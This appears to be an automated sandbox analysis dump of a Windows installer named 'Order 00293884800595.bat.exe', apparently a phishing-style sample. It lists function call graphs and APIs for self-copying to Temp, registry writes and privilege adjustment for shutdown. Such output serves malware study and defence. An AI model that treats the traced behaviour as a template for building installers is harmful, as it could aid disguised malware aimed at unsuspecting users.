4277->4278 4280 405854 SendMessageA 4278->4280 4280->4280 4281 405876 GlobalUnlock SetClipboardData CloseClipboard 4280->4281 4281->4254 4282->4242 4284 406320 21 API calls 4283->4284 4285 404338 SetDlgItemTextA 4284->4285 4285->4268 4286->4272 4287->4243 4289 404313 SendMessageA 4288->4289 4290 40430d 4288->4290 4289->4247 4290->4289 4292 404457 4291->4292 4293 4043ac GetWindowLongA 4291->4293 4292->4254 4293->4292 4294 4043c1 4293->4294 4294->4292 4295 4043f1 4294->4295 4296 4043ee GetSysColor 4294->4296 4297 404401 SetBkMode 4295->4297 4298 4043f7 SetTextColor 4295->4298 4296->4295 4299 404419 GetSysColor 4297->4299 4300 40441f 4297->4300 4298->4297 4299->4300 4301 404430 4300->4301 4302 404426 SetBkColor 4300->4302 4301->4292 4303 404443 DeleteObject 4301->4303 4304 40444a CreateBrushIndirect 4301->4304 4302->4301 4303->4304 4304->4292 4312 404379 4305->4312 4307 4054ed 4308 404379 SendMessageA 4307->4308 4310 4054ff OleUninitialize 4308->4310 4309 4054c6 4309->4307 4315 401389 4309->4315 4313 404391 4312->4313 4314 404382 SendMessageA 4312->4314 4313->4309 4314->4313 4317 401390 4315->4317 4316 4013fe 4316->4309 4317->4316 4318 4013cb MulDiv SendMessageA 4317->4318 4318->4317 4319 40168f 4320 402c5e 21 API calls 4319->4320 4321 401696 4320->4321 4322 402c5e 21 API calls 4321->4322 4323 40169f 4322->4323 4324 402c5e 21 API calls 4323->4324 4325 4016a8 MoveFileA 4324->4325 4326 4016b4 4325->4326 4327 4016bb 4325->4327 4328 401423 28 API calls 4326->4328 4331 40230f 4327->4331 4333 406620 FindFirstFileA 4327->4333 4328->4331 4334 4016ca 4333->4334 4335 406636 FindClose 4333->4335 4334->4331 4336 406066 MoveFileExA 4334->4336 4335->4334 4337 40607a 4336->4337 4339 406087 4336->4339 4340 405ef6 4337->4340 4339->4326 4341 405f42 GetShortPathNameA 4340->4341 4342 405f1c 4340->4342 4344 406061 4341->4344 4345 405f57 4341->4345 4367 405e20 GetFileAttributesA CreateFileA 4342->4367 4344->4339 4345->4344 4347 405f5f wsprintfA 4345->4347 4346 405f26 CloseHandle GetShortPathNameA 4346->4344 4348 405f3a 4346->4348 4349 406320 21 API calls 4347->4349 4348->4341 4348->4344 4350 405f87 4349->4350 4368 405e20 GetFileAttributesA CreateFileA 4350->4368 4352 405f94 4352->4344 4353 405fa3 GetFileSize GlobalAlloc 4352->4353 4354 405fc5 4353->4354 4355 40605a CloseHandle 4353->4355 4369 405e98 ReadFile 4354->4369 4355->4344 4360 405fe4 lstrcpyA 4363 406006 4360->4363 4361 405ff8 4362 405d85 4 API calls 4361->4362 4362->4363 4364 40603d SetFilePointer 4363->4364 4376 405ec7 WriteFile 4364->4376 4367->4346 4368->4352 4370 405eb6 4369->4370 4370->4355 4371 405d85 lstrlenA 4370->4371 4372 405dc6 lstrlenA 4371->4372 4373 405dce 4372->4373 4374 405d9f lstrcmpiA 4372->4374 4373->4360 4373->4361 4374->4373 4375 405dbd CharNextA 4374->4375 4375->4372 4377 405ee5 GlobalFree 4376->4377 4377->4355 5295 6ca522ea 5296 6ca52354 5295->5296 5297 6ca5235f GlobalAlloc 5296->5297 5298 6ca5237e 5296->5298 5297->5296 5299 401490 5300 4053d1 28 API calls 5299->5300 5301 401497 5300->5301 5302 404b10 5303 404b20 5302->5303 5304 404b3c 5302->5304 5313 405987 GetDlgItemTextA 5303->5313 5305 404b42 SHGetPathFromIDListA 5304->5305 5306 404b6f 5304->5306 5308 404b52 5305->5308 5312 404b59 SendMessageA 5305->5312 5310 40140b 2 API calls 5308->5310 5309 404b2d SendMessageA 5309->5304 5310->5312 5312->5306 5313->5309 5314 401a12 5315 402c5e 21 API calls 5314->5315 5316 401a19 5315->5316 5317 402c5e 21 API calls 5316->5317 5318 401a22 5317->5318 5319 401a29 lstrcmpiA 5318->5319 5320 401a3b lstrcmpA 5318->5320 5321 401a2f 5319->5321 5320->5321 5322 401594 5323 4015a4 ShowWindow 5322->5323 5324 4015ab 5322->5324 5323->5324 5325 4015b9 ShowWindow 5324->5325 5326 402aea 5324->5326 5325->5326 5327 6ca52c73 5328 6ca52c8b 5327->5328 5329 6ca515c4 2 API calls 5328->5329 5330 6ca52ca6 5329->5330 4767 402318 4768 402c5e 21 API calls 4767->4768 4769 40231e 4768->4769 4770 402c5e 21 API calls 4769->4770 4771 402327 4770->4771 4772 402c5e 21 API calls 4771->4772 4773 402330 4772->4773 4774 406620 2 API calls 4773->4774 4775 402339 4774->4775 4776 40234a lstrlenA lstrlenA 4775->4776 4777 40233d 4775->4777 4779 4053d1 28 API calls 4776->4779 4778 4053d1 28 API calls 4777->4778 4781 402345 4777->4781 4778->4781 4780 402386 SHFileOperationA 4779->4780 4780->4777 4780->4781 5331 404498 5332 4044ae 5331->5332 5339 4045ba 5331->5339 5335 40432d 22 API calls 5332->5335 5333 404629 5334 4046f3 5333->5334 5336 404633 GetDlgItem 5333->5336 5341 404394 8 API calls 5334->5341 5340 404504 5335->5340 5337 4046b1 5336->5337 5338 404649 5336->5338 5337->5334 5345 4046c3 5337->5345 5338->5337 5344 40466f SendMessageA LoadCursorA SetCursor 5338->5344 5339->5333 5339->5334 5342 4045fe GetDlgItem SendMessageA 5339->5342 5343 40432d 22 API calls 5340->5343 5356 4046ee 5341->5356 5364 40434f KiUserCallbackDispatcher 5342->5364 5347 404511 CheckDlgButton 5343->5347 5368 40473c 5344->5368 5350 4046c9 SendMessageA 5345->5350 5351 4046da 5345->5351 5362 40434f KiUserCallbackDispatcher 5347->5362 5350->5351 5355 4046e0 SendMessageA 5351->5355 5351->5356 5352 404624 5365 404718 5352->5365 5353 40452f GetDlgItem 5363 404362 SendMessageA 5353->5363 5355->5356 5359 404545 SendMessageA 5360 404563 GetSysColor 5359->5360 5361 40456c SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 5359->5361 5360->5361 5361->5356 5362->5353 5363->5359 5364->5352 5366 404726 5365->5366 5367 40472b SendMessageA 5365->5367 5366->5367 5367->5333 5371 405969 ShellExecuteExA 5368->5371 5370 4046a2 LoadCursorA SetCursor 5370->5337 5371->5370 5372 402198 5373 402c5e 21 API calls 5372->5373 5374 40219f 5373->5374 5375 402c5e 21 API calls 5374->5375 5376 4021a9 5375->5376 5377 402c5e 21 API calls 5376->5377 5378 4021b3 5377->5378 5379 402c5e 21 API calls 5378->5379 5380 4021c0 5379->5380 5381 402c5e 21 API calls 5380->5381 5382 4021ca 5381->5382 5383 40220c CoCreateInstance 5382->5383 5384 402c5e 21 API calls 5382->5384 5387 40222b 5383->5387 5389 4022d9 5383->5389 5384->5383 5385 401423 28 API calls 5386 40230f 5385->5386 5388 4022b9 MultiByteToWideChar 5387->5388 5387->5389 5388->5389 5389->5385 5389->5386 4782 40269a 4783 402c3c 21 API calls 4782->4783 4786 4026a4 4783->4786 4784 402712 4785 405e98 ReadFile 4785->4786 4786->4784 4786->4785 4787 402714 4786->4787 4789 402724 4786->4789 4791 4061eb wsprintfA 4787->4791 4789->4784 4790 40273a SetFilePointer 4789->4790 4790->4784 4791->4784 5390 40239a 5391 4023a1 5390->5391 5393 4023b4 5390->5393 5392 406320 21 API calls 5391->5392 5394 4023ae 5392->5394 5394->5393 5395 4059a3 MessageBoxIndirectA 5394->5395 5395->5393 5396 402a1b 5397 402a22 5396->5397 5398 402a6e 5396->5398 5401 402c3c 21 API calls 5397->5401 5404 402a6c 5397->5404 5399 4066b5 5 API calls 5398->5399 5400 402a75 5399->5400 5402 402c5e 21 API calls 5400->5402 5403 402a30 5401->5403 5405 402a7e 5402->5405 5406 402c3c 21 API calls 5403->5406 5405->5404 5414 4062e0 5405->5414 5408 402a3f 5406->5408 5413 4061eb wsprintfA 5408->5413 5410 402a8c 5410->5404 5418 4062ca 5410->5418 5413->5404 5415 4062eb 5414->5415 5416 40630e IIDFromString 5415->5416 5417 406307 5415->5417 5416->5410 5417->5410 5421 4062af WideCharToMultiByte 5418->5421 5420 402aad CoTaskMemFree 5420->5404 5421->5420 5422 40149d 5423 4023b4 5422->5423 5424 4014ab PostQuitMessage 5422->5424 5424->5423 5425 401f1e 5426 402c5e 21 API calls 5425->5426 5427 401f24 5426->5427 5428 402c5e 21 API calls 5427->5428 5429 401f2d 5428->5429 5430 402c5e 21 API calls 5429->5430 5431 401f36 5430->5431 5432 402c5e 21 API calls 5431->5432 5433 401f3f 5432->5433 5434 401423 28 API calls 5433->5434 5435 401f46 5434->5435 5442 405969 ShellExecuteExA 5435->5442 5437 401f81 5438 40672a 5 API calls 5437->5438 5439 4027ed 5437->5439 5440 401f9b CloseHandle 5438->5440 5440->5439 5442->5437 4812 401fa0 4813 402c5e 21 API calls 4812->4813 4814 401fa6 4813->4814 4815 4053d1 28 API calls 4814->4815 4816 401fb0 4815->4816 4817 405926 2 API calls 4816->4817 4818 401fb6 4817->4818 4819 401fd7 CloseHandle 4818->4819 4823 4027ed 4818->4823 4827 40672a WaitForSingleObject 4818->4827 4819->4823 4822 401fcb 4824 401fd0 4822->4824 4825 401fd9 4822->4825 4832 4061eb wsprintfA 4824->4832 4825->4819 4828 406744 4827->4828 4829 406756 GetExitCodeProcess 4828->4829 4830 4066f1 2 API calls 4828->4830 4829->4822 4831 40674b WaitForSingleObject 4830->4831 4831->4828 4832->4819 5443 402020 5444 402c5e 21 API calls 5443->5444 5445 402027 5444->5445 5446 4066b5 5 API calls 5445->5446 5447 402036 5446->5447 5448 4020be 5447->5448 5449 40204e GlobalAlloc 5447->5449 5449->5448 5450 402062 5449->5450 5451 4066b5 5 API calls 5450->5451 5452 402069 5451->5452 5453 4066b5 5 API calls 5452->5453 5454 402073 5453->5454 5454->5448 5458 4061eb wsprintfA 5454->5458 5456 4020ae 5459 4061eb wsprintfA 5456->5459 5458->5456 5459->5448 5460 6ca518c7 5461 6ca518ea 5460->5461 5462 6ca5191a GlobalFree 5461->5462 5463 6ca5192c 5461->5463 5462->5463 5464 6ca512f6 2 API calls 5463->5464 5465 6ca51aae GlobalFree GlobalFree 5464->5465 5466 401922 5467 401959 5466->5467 5468 402c5e 21 API calls 5467->5468 5469 40195e 5468->5469 5470 405a4f 71 API calls 5469->5470 5471 401967 5470->5471 4833 4024a3 4834 402c5e 21 API calls 4833->4834 4835 4024b5 4834->4835 4836 402c5e 21 API calls 4835->4836 4837 4024bf 4836->4837 4850 402cee 4837->4850 4840 402aea 4841 4024f4 4842 402500 4841->4842 4844 402c3c 21 API calls 4841->4844 4845 402522 RegSetValueExA 4842->4845 4847 403168 35 API calls 4842->4847 4843 402c5e 21 API calls 4846 4024ed lstrlenA 4843->4846 4844->4842 4848 402538 RegCloseKey 4845->4848 4846->4841 4847->4845 4848->4840 4851 402d09 4850->4851 4854 406141 4851->4854 4855 406150 4854->4855 4856 4024cf 4855->4856 4857 40615b RegCreateKeyExA 4855->4857 4856->4840 4856->4841 4856->4843 4857->4856 5472 401d23 5473 402c3c 21 API calls 5472->5473 5474 401d29 IsWindow 5473->5474 5475 401a33 5474->5475 5476 401925 5477 402c5e 21 API calls 5476->5477 5478 40192c 5477->5478 5479 4059a3 MessageBoxIndirectA 5478->5479 5480 401935 5479->5480 5481 4027a5 5482 4027ab 5481->5482 5483 4027af FindNextFileA 5482->5483 5485 4027c1 5482->5485 5484 402800 5483->5484 5483->5485 5487 40628d lstrcpynA 5484->5487 5487->5485 4873 401bac 4874 401bb9 4873->4874 4875 401bfd 4873->4875 4876 401c41 4874->4876 4882 401bd0 4874->4882 4877 401c01 4875->4877 4878 401c26 GlobalAlloc 4875->4878 4880 406320 21 API calls 4876->4880 4884 4023b4 4876->4884 4877->4884 4892 40628d lstrcpynA 4877->4892 4879 406320 21 API calls 4878->4879 4879->4876 4886 4023ae 4880->4886 4893 40628d lstrcpynA 4882->4893 4883 401c13 GlobalFree 4883->4884 4886->4884 4887 4059a3 MessageBoxIndirectA 4886->4887 4887->4884 4888 401bdf 4894 40628d lstrcpynA 4888->4894 4890 401bee 4895 40628d lstrcpynA 4890->4895 4892->4883 4893->4888 4894->4890 4895->4884 5488 6ca516c8 5489 6ca516f7 5488->5489 5490 6ca51b28 18 API calls 5489->5490 5491 6ca516fe 5490->5491 5492 6ca51705 5491->5492 5493 6ca51711 5491->5493 5494 6ca512f6 2 API calls 5492->5494 5495 6ca51738 5493->5495 5496 6ca5171b 5493->5496 5504 6ca5170f 5494->5504 5497 6ca51762 5495->5497 5498 6ca5173e 5495->5498 5499 6ca51572 3 API calls 5496->5499 5501 6ca51572 3 API calls 5497->5501 5500 6ca515e9 3 API calls 5498->5500 5502 6ca51720 5499->5502 5503 6ca51743 5500->5503 5501->5504 5505 6ca515e9 3 API calls 5502->5505 5506 6ca512f6 2 API calls 5503->5506 5507 6ca51726 5505->5507 5508 6ca51749 GlobalFree 5506->5508 5509 6ca512f6 2 API calls 5507->5509 5508->5504 5511 6ca5175d GlobalFree 5508->5511 5510 6ca5172c GlobalFree 5509->5510 5510->5504 5511->5504 5512 4029af 5513 402c3c 21 API calls 5512->5513 5514 4029b5 5513->5514 5515 4027ed 5514->5515 5516 406320 21 API calls 5514->5516 5516->5515 5517 402631 5518 402c5e 21 API calls 5517->5518 5519 402638 5518->5519 5522 405e20 GetFileAttributesA CreateFileA 5519->5522 5521 402644 5522->5521 5523 404d32 GetDlgItem GetDlgItem 5524 404d88 7 API calls 5523->5524 5535 404faf 5523->5535 5525 404e30 DeleteObject 5524->5525 5526 404e24 SendMessageA 5524->5526 5527 404e3b 5525->5527 5526->5525 5529 404e72 5527->5529 5530 406320 21 API calls 5527->5530 5528 405091 5532 40513d 5528->5532 5538 404fa2 5528->5538 5543 4050ea SendMessageA 5528->5543 5531 40432d 22 API calls 5529->5531 5536 404e54 SendMessageA SendMessageA 5530->5536 5537 404e86 5531->5537 5533 405147 SendMessageA 5532->5533 5534 40514f 5532->5534 5533->5534 5545 405161 ImageList_Destroy 5534->5545 5546 405168 5534->5546 5554 405178 5534->5554 5535->5528 5541 404c80 5 API calls 5535->5541 5557 40501e 5535->5557 5536->5527 5542 40432d 22 API calls 5537->5542 5540 404394 8 API calls 5538->5540 5539 405083 SendMessageA 5539->5528 5544 40533e 5540->5544 5541->5557 5558 404e97 5542->5558 5543->5538 5548 4050ff SendMessageA 5543->5548 5545->5546 5549 405171 GlobalFree 5546->5549 5546->5554 5547 4052f2 5547->5538 5552 405304 ShowWindow GetDlgItem ShowWindow 5547->5552 5551 405112 5548->5551 5549->5554 5550 404f71 GetWindowLongA SetWindowLongA 5553 404f8a 5550->5553 5559 405123 SendMessageA 5551->5559 5552->5538 5555 404fa7 5553->5555 5556 404f8f ShowWindow 5553->5556 5554->5547 5567 404d00 4 API calls 5554->5567 5569 4051b3 5554->5569 5576 404362 SendMessageA 5555->5576 5575 404362 SendMessageA 5556->5575 5557->5528 5557->5539 5558->5550 5560 404f6c 5558->5560 5564 404ee9 SendMessageA 5558->5564 5565 404f27 SendMessageA 5558->5565 5566 404f3b SendMessageA 5558->5566 5559->5532 5560->5550 5560->5553 5561 4051f7 5568 4052bd 5561->5568 5574 40526b SendMessageA SendMessageA 5561->5574 5564->5558 5565->5558 5566->5558 5567->5569 5570 4052c8 InvalidateRect 5568->5570 5572 4052d4 5568->5572 5569->5561 5571 4051e1 SendMessageA 5569->5571 5570->5572 5571->5561 5572->5547 5577 404c3b 5572->5577 5574->5561 5575->5538 5576->5535 5580 404b76 5577->5580 5579 404c50 5579->5547 5581 404b8c 5580->5581 5582 406320 21 API calls 5581->5582 5583 404bf0 5582->5583 5584 406320 21 API calls 5583->5584 5585 404bfb 5584->5585 5586 406320 21 API calls 5585->5586 5587 404c11 lstrlenA wsprintfA SetDlgItemTextA 5586->5587 5587->5579 4896 403e33 4897 403e4b 4896->4897 4898 403fac 4896->4898 4897->4898 4899 403e57 4897->4899 4900 403ffd 4898->4900 4901 403fbd GetDlgItem GetDlgItem 4898->4901 4903 403e62 SetWindowPos 4899->4903 4904 403e75 4899->4904 4902 404057 4900->4902 4910 401389 2 API calls 4900->4910 4905 40432d 22 API calls 4901->4905 4906 404379 SendMessageA 4902->4906 4911 403fa7 4902->4911 4903->4904 4907 403ec0 4904->4907 4908 403e7e ShowWindow 4904->4908 4909 403fe7 SetClassLongA 4905->4909 4935 404069 4906->4935 4914 403ec8 DestroyWindow 4907->4914 4915 403edf 4907->4915 4912 403f99 4908->4912 4913 403e9e GetWindowLongA 4908->4913 4916 40140b 2 API calls 4909->4916 4919 40402f 4910->4919 4920 404394 8 API calls 4912->4920 4913->4912 4921 403eb7 ShowWindow 4913->4921 4968 4042b6 4914->4968 4917 403ee4 SetWindowLongA 4915->4917 4918 403ef5 4915->4918 4916->4900 4917->4911 4918->4912 4922 403f01 GetDlgItem 4918->4922 4919->4902 4923 404033 SendMessageA 4919->4923 4920->4911 4921->4907 4926 403f12 SendMessageA IsWindowEnabled 4922->4926 4927 403f2f 4922->4927 4923->4911 4924 40140b 2 API calls 4924->4935 4925 4042b8 DestroyWindow EndDialog 4925->4968 4926->4911 4926->4927 4930 403f3c 4927->4930 4932 403f83 SendMessageA 4927->4932 4933 403f4f 4927->4933 4942 403f34 4927->4942 4928 4042e7 ShowWindow 4928->4911 4929 406320 21 API calls 4929->4935 4930->4932 4930->4942 4931 404306 SendMessageA 4934 403f6a 4931->4934 4932->4912 4936 403f57 4933->4936 4937 403f6c 4933->4937 4934->4912 4935->4911 4935->4924 4935->4925 4935->4929 4938 40432d 22 API calls 4935->4938 4943 40432d 22 API calls 4935->4943 4959 4041f8 DestroyWindow 4935->4959 4940 40140b 2 API calls 4936->4940 4939 40140b 2 API calls 4937->4939 4938->4935 4941 403f73 4939->4941 4940->4942 4941->4912 4941->4942 4942->4931 4944 4040e4 GetDlgItem 4943->4944 4945 404101 ShowWindow KiUserCallbackDispatcher 4944->4945 4946 4040f9 4944->4946 4969 40434f KiUserCallbackDispatcher 4945->4969 4946->4945 4948 40412b EnableWindow 4953 40413f 4948->4953 4949 404144 GetSystemMenu EnableMenuItem SendMessageA 4950 404174 SendMessageA 4949->4950 4949->4953 4950->4953 4952 403e14 22 API calls 4952->4953 4953->4949 4953->4952 4970 404362 SendMessageA 4953->4970 4971 40628d lstrcpynA 4953->4971 4955 4041a3 lstrlenA 4956 406320 21 API calls 4955->4956 4957 4041b4 SetWindowTextA 4956->4957 4958 401389 2 API calls 4957->4958 4958->4935 4960 404212 CreateDialogParamA 4959->4960 4959->4968 4961 404245 4960->4961 4960->4968 4962 40432d 22 API calls 4961->4962 4963 404250 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4962->4963 4964 401389 2 API calls 4963->4964 4965 404296 4964->4965 4965->4911 4966 40429e ShowWindow 4965->4966 4967 404379 SendMessageA 4966->4967 4967->4968 4968->4911 4968->4928 4969->4948 4970->4953 4971->4955 4972 4025b5 4973 402c9e 21 API calls 4972->4973 4974 4025bf 4973->4974 4975 402c3c 21 API calls 4974->4975 4976 4025c8 4975->4976 4977 4025d6 4976->4977 4982 4027ed 4976->4982 4978 4025e3 RegEnumKeyA 4977->4978 4979 4025ef RegEnumValueA 4977->4979 4980 40260b RegCloseKey 4978->4980 4979->4980 4981 402604 4979->4981 4980->4982 4981->4980 5588 4014b7 5589 4014bd 5588->5589 5590 401389 2 API calls 5589->5590 5591 4014c5 5590->5591 5592 6ca51058 5594 6ca51074 5592->5594 5593 6ca510dc 5594->5593 5595 6ca5154b GlobalFree 5594->5595 5596 6ca51091 5594->5596 5595->5596 5597 6ca5154b GlobalFree 5596->5597 5598 6ca510a1 5597->5598 5599 6ca510b1 5598->5599 5600 6ca510a8 GlobalSize 5598->5600 5601 6ca510b5 GlobalAlloc 5599->5601 5602 6ca510c6 5599->5602 5600->5599 5603 6ca51572 3 API calls 5601->5603 5604 6ca510d1 GlobalFree 5602->5604 5603->5602 5604->5593 5605 4047bf 5606 4047eb 5605->5606 5607 4047fc 5605->5607 5666 405987 GetDlgItemTextA 5606->5666 5609 404808 GetDlgItem 5607->5609 5611 404867 5607->5611 5610 40481c 5609->5610 5615 404830 SetWindowTextA 5610->5615 5618 405cb8 4 API calls 5610->5618 5612 40494b 5611->5612 5620 406320 21 API calls 5611->5620 5664 404af5 5611->5664 5612->5664 5668 405987 GetDlgItemTextA 5612->5668 5613 4047f6 5614 406587 5 API calls 5613->5614 5614->5607 5619 40432d 22 API calls 5615->5619 5617 404394 8 API calls 5622 404b09 5617->5622 5623 404826 5618->5623 5624 40484c 5619->5624 5625 4048db SHBrowseForFolderA 5620->5625 5621 40497b 5626 405d0d 18 API calls 5621->5626 5623->5615 5629 405c1f 3 API calls 5623->5629 5627 40432d 22 API calls 5624->5627 5625->5612 5628 4048f3 CoTaskMemFree 5625->5628 5632 404981 5626->5632 5630 40485a 5627->5630 5631 405c1f 3 API calls 5628->5631 5629->5615 5667 404362 SendMessageA 5630->5667 5634 404900 5631->5634 5669 40628d lstrcpynA 5632->5669 5637 404937 SetDlgItemTextA 5634->5637 5641 406320 21 API calls 5634->5641 5636 404860 5639 4066b5 5 API calls 5636->5639 5637->5612 5638 404998 5640 4066b5 5 API calls 5638->5640 5639->5611 5647 40499f 5640->5647 5642 40491f lstrcmpiA 5641->5642 5642->5637 5644 404930 lstrcatA 5642->5644 5643 4049db 5670 40628d lstrcpynA 5643->5670 5644->5637 5646 4049e2 5648 405cb8 4 API calls 5646->5648 5647->5643 5652 405c66 2 API calls 5647->5652 5653 404a33 5647->5653 5649 4049e8 GetDiskFreeSpaceA 5648->5649 5651 404a0c MulDiv 5649->5651 5649->5653 5651->5653 5652->5647 5654 404aa4 5653->5654 5656 404c3b 24 API calls 5653->5656 5655 404ac7 5654->5655 5657 40140b 2 API calls 5654->5657 5671 40434f KiUserCallbackDispatcher 5655->5671 5658 404a91 5656->5658 5657->5655 5660 404aa6 SetDlgItemTextA 5658->5660 5661 404a96 5658->5661 5660->5654 5662 404b76 24 API calls 5661->5662 5662->5654 5663 404ae3 5663->5664 5665 404718 SendMessageA 5663->5665 5664->5617 5665->5664 5666->5613 5667->5636 5668->5621 5669->5638 5670->5646 5671->5663

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 4033d8-403428 SetErrorMode GetVersionExA 1 403469 0->1 2 40342a-403444 GetVersionExA 0->2 3 403470 1->3 2->3 4 403446-403465 2->4 5 403472-40347d 3->5 6 403494-40349b 3->6 4->1 9 403490 5->9 10 40347f-40348e 5->10 7 4034a5-4034e5 6->7 8 40349d 6->8 11 4034e7-4034ef call 4066b5 7->11 12 4034f8 7->12 8->7 9->6 10->6 11->12 17 4034f1 11->17 14 4034fd-403511 call 406647 lstrlenA 12->14 19 403513-40352f call 4066b5 * 3 14->19 17->12 26 403540-4035a0 #17 OleInitialize SHGetFileInfoA call 40628d GetCommandLineA call 40628d 19->26 27 403531-403537 19->27 34 4035a2-4035a6 26->34 35 4035ab-4035be call 405c4a CharNextA 26->35 27->26 31 403539 27->31 31->26 34->35 38 40367f-403683 35->38 39 4035c3-4035c6 38->39 40 403689 38->40 41 4035c8-4035cc 39->41 42 4035ce-4035d5 39->42 43 40369d-4036b7 GetTempPathA call 4033a7 40->43 41->41 41->42 44 4035d7-4035d8 42->44 45 4035dc-4035df 42->45 52 4036b9-4036d7 GetWindowsDirectoryA lstrcatA call 4033a7 43->52 53 40370f-403727 DeleteFileA call 402f31 43->53 44->45 47 403670-40367c call 405c4a 45->47 48 4035e5-4035e9 45->48 47->38 63 40367e 47->63 50 403601-40362e 48->50 51 4035eb-4035f1 48->51 59 403640-40366e 50->59 60 403630-403636 50->60 57 4035f3-4035f5 51->57 58 4035f7 51->58 52->53 71 4036d9-403709 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4033a7 52->71 68 4037ba-4037cb call 4039bc OleUninitialize 53->68 69 40372d-403733 53->69 57->50 57->58 58->50 59->47 67 40368b-403698 call 40628d 59->67 64 403638-40363a 60->64 65 40363c 60->65 63->38 64->59 64->65 65->59 67->43 82 4037d1-4037e0 call 4059a3 ExitProcess 68->82 83 403928-40392e 68->83 72 403735-403740 call 405c4a 69->72 73 4037ab-4037b2 call 403a96 69->73 71->53 71->68 86 403742-40376b 72->86 87 403776-40377f 72->87 80 4037b7 73->80 80->68 84 403930-403945 GetCurrentProcess OpenProcessToken 83->84 85 4039a6-4039ae 83->85 91 403976-403984 call 4066b5 84->91 92 403947-403970 LookupPrivilegeValueA AdjustTokenPrivileges 84->92 89 4039b0 85->89 90 4039b3-4039b6 ExitProcess 85->90 93 40376d-40376f 86->93 94 403781-40378f call 405d0d 87->94 95 4037e6-40380a call 40590e lstrlenA call 40628d 87->95 89->90 104 403992-40399d ExitWindowsEx 91->104 105 403986-403990 91->105 92->91 93->87 98 403771-403774 93->98 94->68 106 403791-4037a7 call 40628d * 2 94->106 111 40381b-403830 95->111 112 40380c-403816 call 40628d 95->112 98->87 98->93 104->85 108 40399f-4039a1 call 40140b 104->108 105->104 105->108 106->73 108->85 118 403835 111->118 112->111 120 403839-403865 wsprintfA call 406320 118->120 123 403867-40386c call 405897 120->123 124 40386e call 4058f1 120->124 128 403873-403875 123->128 124->128 129 403877-403881 GetFileAttributesA 128->129 130 4038af-4038ce SetCurrentDirectoryA call 406066 CopyFileA 128->130 132 4038a0-4038a8 129->132 133 403883-40388c DeleteFileA 129->133 130->68 138 4038d4-4038f5 call 406066 call 406320 call 405926 130->138 132->118 134 4038aa 132->134 133->132 136 40388e-40389e call 405a4f 133->136 134->68 136->120 136->132 146 4038f7-4038ff 138->146 147 403918-403923 CloseHandle 138->147 146->68 148 403905-40390d call 406620 146->148 147->68 148->120 151 403913 148->151 151->68
                                                  APIs
                                                  • SetErrorMode.KERNELBASE(00008001), ref: 004033FB
                                                  • GetVersionExA.KERNEL32(?), ref: 00403424
                                                  • GetVersionExA.KERNEL32(0000009C), ref: 0040343B
                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403504
                                                  • #17.COMCTL32(?,00000008,0000000A,0000000C), ref: 00403541
                                                  • OleInitialize.OLE32(00000000), ref: 00403548
                                                  • SHGetFileInfoA.SHELL32(00429448,00000000,?,00000160,00000000,?,00000008,0000000A,0000000C), ref: 00403566
                                                  • GetCommandLineA.KERNEL32(humpende Setup,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040357B
                                                  • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Order 00293884800595.bat.exe",00000020,"C:\Users\user\Desktop\Order 00293884800595.bat.exe",00000000,?,00000008,0000000A,0000000C), ref: 004035B5
                                                  • GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000008,0000000A,0000000C), ref: 004036AE
                                                  • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C), ref: 004036BF
                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C), ref: 004036CB
                                                  • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C), ref: 004036DF
                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C), ref: 004036E7
                                                  • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C), ref: 004036F8
                                                  • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C), ref: 00403700
                                                  • DeleteFileA.KERNELBASE(1033,?,00000008,0000000A,0000000C), ref: 00403714
                                                  • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C), ref: 004037BF
                                                  • ExitProcess.KERNEL32 ref: 004037E0
                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Order 00293884800595.bat.exe",00000000,?,?,00000008,0000000A,0000000C), ref: 004037EF
                                                  • wsprintfA.USER32 ref: 00403846
                                                  • GetFileAttributesA.KERNEL32(00431400,C:\Users\user\AppData\Local\Temp\,00431400,?,0000000C), ref: 00403878
                                                  • DeleteFileA.KERNEL32(00431400), ref: 00403884
                                                  • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00431400,?,0000000C), ref: 004038B0
                                                  • CopyFileA.KERNEL32(C:\Users\user\Desktop\Order 00293884800595.bat.exe,00431400,00000001), ref: 004038C6
                                                  • CloseHandle.KERNEL32(00000000,00431800,00431800,?,00431400,00000000), ref: 00403919
                                                  • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C), ref: 00403936
                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 0040393D
                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403951
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403970
                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403995
                                                  • ExitProcess.KERNEL32 ref: 004039B6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
